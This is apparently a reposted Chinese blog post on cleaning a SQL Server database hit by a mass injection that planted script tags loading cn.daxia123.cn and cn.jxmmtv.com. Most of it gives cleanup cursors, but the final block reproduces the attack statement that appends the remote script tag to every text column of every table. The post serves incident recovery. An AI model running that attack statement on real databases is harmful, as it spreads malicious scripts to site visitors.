zoukankan      html  css  js  c++  java
  • 数据库被注入daxia123或cn.jxmmtv.com原因及解决办法

    --去掉<script src=http://cn.daxia123.cn/cn.js></script>
    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name FROM sysobjects a,syscolumns b
    WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE
    (cast(['+@C+'] as varchar(8000)),''<script src=http://cn.daxia123.cn/cn.js></script>'','''')')
    FETCH NEXT FROM Table_Cursor INTO @T,@C END
    CLOSE Table_Cursor DEALLOCATE Table_Cursor

    --去掉<script src=http://cn.jxmmtv.com/cn.js></script>


    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name FROM sysobjects a,syscolumns b
    WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE
    (cast(['+@C+'] as varchar(8000)),''<script src=http://cn.jxmmtv.com/cn.js></script>'','''')')
    FETCH NEXT FROM Table_Cursor INTO @T,@C END
    CLOSE Table_Cursor DEALLOCATE Table_Cursor

    数据被修改可能所使用语句: 正式数据库勿用.切记  ^_^

    DECLARE @T VARCHAR(255),@C VARCHAR(255)
    DECLARE Table_Cursor CURSOR FOR
    SELECT a.name,b.name FROM sysobjects a,syscolumns b
    WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM
    (CONVERT(VARCHAR(4000),['+@C+']))+'' <script
    src=http://cn.daxia123.cn/cn.js> </script>''')
    FETCH NEXT FROM Table_Cursor INTO @T,@C END
    CLOSE Table_Cursor DEALLOCATE Table_Cursor

  • 相关阅读:
    选择、插入、气泡排序
    JDBC基础学习(四)—数据库事务
    JDBC基础学习(三)—处理BLOB类型数据
    JDBC基础学习(二)—PreparedStatement
    JDBC基础学习(一)—JDBC的增删改查
    JavaWeb总结(十)—文件上传和下载
    JavaWeb总结(九)—过滤器
    JavaWeb总结(八)—EL表达式
    Java基础学习(三)—面向对象(上)
    MySQL学习笔记(一)—数据库基础
  • 原文地址:https://www.cnblogs.com/wfnice12/p/1382274.html
Copyright © 2011-2022 走看看